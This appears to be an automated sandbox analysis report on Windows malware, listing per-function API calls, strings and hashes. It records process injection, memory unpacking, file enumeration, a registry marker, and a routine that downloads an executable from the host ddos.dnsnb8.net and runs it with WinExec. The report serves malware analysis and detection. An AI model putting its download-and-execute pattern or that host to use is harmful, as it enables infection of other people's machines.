Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040311D
NtTerminateProcess.NTDLL ref: 00403136

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

Function 006E0D11 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006E0D39
Module32First.KERNEL32(00000000,00000224), ref: 006E0D59

Memory Dump Source

Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cda4395146910774a27b4ca34aed0eaf7452307566ac7b0c094544ae140b3e2e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 32F0C235101314ABE7203AFAAC8CBAA72EAAF48320F100528E642911C1DAF0FC854B61

Function 00417D6F Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 214
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,00000000), ref: 00417E02
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417E10
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417E27
lstrcpynW.KERNEL32(?,00000000,00000000), ref: 00417E36
GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00417E3F
SetFileApisToANSI.KERNEL32 ref: 00417E45
SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417E4D
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00417E5C
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00417E65
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00417E9D
AddAtomA.KERNEL32(00000000), ref: 00417EA4
GetCommProperties.KERNELBASE(00000000,?), ref: 00417EB2
SetLastError.KERNEL32(00000000), ref: 00417EB9
GetProcessDefaultLayout.USER32(00000000), ref: 00417EC8
ReleaseActCtx.KERNEL32(00000000), ref: 00417EDB
GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00417EEA
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00417F06
SetConsoleTitleA.KERNEL32(00000000), ref: 00417F4A
LocalFree.KERNEL32(00000000), ref: 00417F51
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417F68
LoadLibraryA.KERNELBASE(0041A448), ref: 00417FEC

Strings

k`, xrefs: 00418000
tl_, xrefs: 00417DE3
}$, xrefs: 0041800D

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: Console$AliasesAtomFileName$AllocApisCommDateDefaultEnumErrorExchangeFoldFormatsFreeGlobalInterlockedLastLayoutLengthLibraryLoadLocalModuleMountPointProcessPropertiesReleaseStringTitleVolumeWritelstrcatlstrcpyn
String ID: k`$tl_$}$
API String ID: 2707108674-211918992
Opcode ID: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
Instruction ID: ddf06cef7b4f2340048b7641273970f77a1e110b5080587248a091a61e489f39
Opcode Fuzzy Hash: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
Instruction Fuzzy Hash: FE61AE71506124ABD725AB66EC58DEF3F7CFF0A355B10417AF205D2121CB388A82CBAD

Function 0060003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D

Strings

kernel32.dll, xrefs: 0060008F, 00600095
cess, xrefs: 0060018D

Memory Dump Source

Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14

Function 00600E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E

Memory Dump Source

Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5

Function 00417B14 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 00417B2A

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
Instruction ID: ba6cbb3cd07b257a8cb762b1762eaf264e462e583e55377f58ee2727f3315d2d
Opcode Fuzzy Hash: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
Instruction Fuzzy Hash: 9BC08C7520020ABFCB018B82FC01E863B6CE308284F004271F702A00B0C2B1E900AB1C

Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F

Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F

Function 006E09D0 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E0A21

Memory Dump Source

Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c1a3775681a7cb621aca036aab15b995d891dc2db0ab9b45b0648f2aa71087a6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C8113C79A00248EFDB01DF99C985E98BBF5AF08751F1580A4F9489B362D371EA90DF80

Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F

Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F

Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

Function 00417AF3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
Instruction ID: 11052f0533907eac1b5ead624f86bd19dd77f4dadc222b17fd93c0952cc8d916
Opcode Fuzzy Hash: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
Instruction Fuzzy Hash: DDB092B08083059FEB404F269C093593A20F704272F18877AED28882E5EBA08A40AF25

Function 00417AF5 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
Instruction ID: cd47c4b9bc37ffacf91a7bbe6c6ae0b538b313659090cfa5301434a9e3d42730
Opcode Fuzzy Hash: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
Instruction Fuzzy Hash: 77B012B44002008FC7400F50AC14B413E20E30C343F008334E60444170C7704100BF19

Non-executed Functions

Function 0060092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 00600966
GetProcAddress., xrefs: 006009DC, 006009DF, 006009E4
., xrefs: 0060095F

Memory Dump Source

Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: ca3e0dc928b3eb58f5f920a532e04de175240ee417e0ebceb62b96e15e73e0bb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 683137B6900609DFEB14CF99C880BAEBBF6FF48324F25504AD441A7351D771EA45CBA4

Function 006E05EE Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de000_7Y18r(14).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: bd4ba21ee053fb4504af7c315df4e4b81d857cdd4a987e5d6b8c7acdbf418dad
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: A01182727412409FE754DF56DC81FA673EAFB88320B298055ED08CB312E6B5EC52C760

Function 00600D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_600000_7Y18r(14).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 0d8b75db3329e727e2f298a538b10a5da1ac7c04e1debf53f6a48a6320adb0d8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: FD01A7766406048FEF25CF64C804BEB33E6EF85315F4544E5D506973C2E774A9418B90

Function 00417C78 Relevance: 6.0, APIs: 4, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00417C8F
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 00417CAC
BuildCommDCBW.KERNEL32(00000000,?), ref: 00417CB7
LoadLibraryA.KERNEL32(00000000), ref: 00417CBE

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: Object$BuildCommCreateLibraryLoadOpen
String ID:
API String ID: 2043902199-0
Opcode ID: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
Instruction ID: ff2d894db08d9522882be8ab69f88837e2f2e12f0baac11470308de566c9cd02
Opcode Fuzzy Hash: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
Instruction Fuzzy Hash: A5E06D31402124EB8B106F25ED1CCCB7FBCEF0A355B008224F50191161E3384A41CFED

Function 00417B32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004B1090), ref: 00417BFE
GetProcAddress.KERNEL32(00000000,0041E260), ref: 00417C3B

Strings

, xrefs: 00417B84

Memory Dump Source

Source File: 00000004.00000002.1462016010.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_7Y18r(14).jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
Instruction ID: 842860c07696174ee3ee74213301e8bfe93044c7bdd6e35420a9822fc7fd421d
Opcode Fuzzy Hash: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
Instruction Fuzzy Hash: DC31822955C3C0D9F30197A9BC367A13BA99B15B44F5446BADE448B2B1D3F60584C32E

Analysis Process: IXDaI.exePID: 7516, Parent PID: 7488COMMON

Execution Graph

Execution Coverage:	28.8%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	23.6%
Total number of Nodes:	297
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00BA29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BA2A02
wsprintfA.USER32 ref: 00BA2A1A
memset.MSVCRT ref: 00BA2A44
lstrlen.KERNEL32(?), ref: 00BA2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BA2A6C
strrchr.MSVCRT ref: 00BA2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BA2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00BA2AAE
memset.MSVCRT ref: 00BA2AC6
memset.MSVCRT ref: 00BA2ADA
FindFirstFileA.KERNEL32(?,?), ref: 00BA2AEF
memset.MSVCRT ref: 00BA2B13
lstrcmpiA.KERNEL32(?,?), ref: 00BA2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00BA2B67
FindClose.KERNEL32(00000000), ref: 00BA2B6E

Strings

Documents and Settings, xrefs: 00BA2A8D, 00BA2A92, 00BA2A9A, 00BA2AAD
%s*, xrefs: 00BA2A14
C:\, xrefs: 00BA2A2F

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 9a14684858d098d8fa5b4f94cb6e276c647a7c84215983239da6723e266a6db4
Instruction ID: cace02138ca3db2749071a1a9fca48fa99a2b0ea70f8462768d23f2aa0dc97a2
Opcode Fuzzy Hash: 9a14684858d098d8fa5b4f94cb6e276c647a7c84215983239da6723e266a6db4
Instruction Fuzzy Hash: 154167B2408349AFD731DB94DC89EDB77ECEB86715F04086AF944D3111EA35DA4887A1

Function 00BA1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894

WinExec.KERNEL32(?,00000005), ref: 00BA10F1
lstrlen.KERNEL32(00BA4748), ref: 00BA10FA
wsprintfA.USER32 ref: 00BA112A
wsprintfA.USER32 ref: 00BA1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00BA115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00BA1169
Sleep.KERNEL32 ref: 00BA1179

Strings

http://%s:%d/%s/%s, xrefs: 00BA10C2, 00BA1141
cj/, xrefs: 00BA1135
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA1119
%s%.8X.exe, xrefs: 00BA1124
ddos.dnsnb8.net, xrefs: 00BA10C8, 00BA10CF, 00BA1140, 00BA1168

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-1863643174
Opcode ID: abe9343e243f7bca3044f25bc58270a47b18ea43a50783a75917fc146f0a0040
Instruction ID: d2fcdd66a72c5c9bd6e34d10f4989b384370754f0068f0f15278dbac60b128a9
Opcode Fuzzy Hash: abe9343e243f7bca3044f25bc58270a47b18ea43a50783a75917fc146f0a0040
Instruction Fuzzy Hash: 01217A75908248BEDB609BA4DC4ABAFBBFCEB47715F1144D5E501A3050DBB49B848F60

Function 00BA1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00BA174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00BA177C
__aulldiv.LIBCMT ref: 00BA1796
__aulldiv.LIBCMT ref: 00BA17A8

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA1722
Time, xrefs: 00BA173D, 00BA1766
SOFTWARE\GTplus, xrefs: 00BA1742, 00BA176B

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-4280275245
Opcode ID: cf13d2695ce054fe90f6535d36ee6bdb1474c338280260f5b1725ca6b120cc4f
Instruction ID: c5d275e695e62468f9b7296518a464e4ffa006ef3a790542da9ca43c37eea533
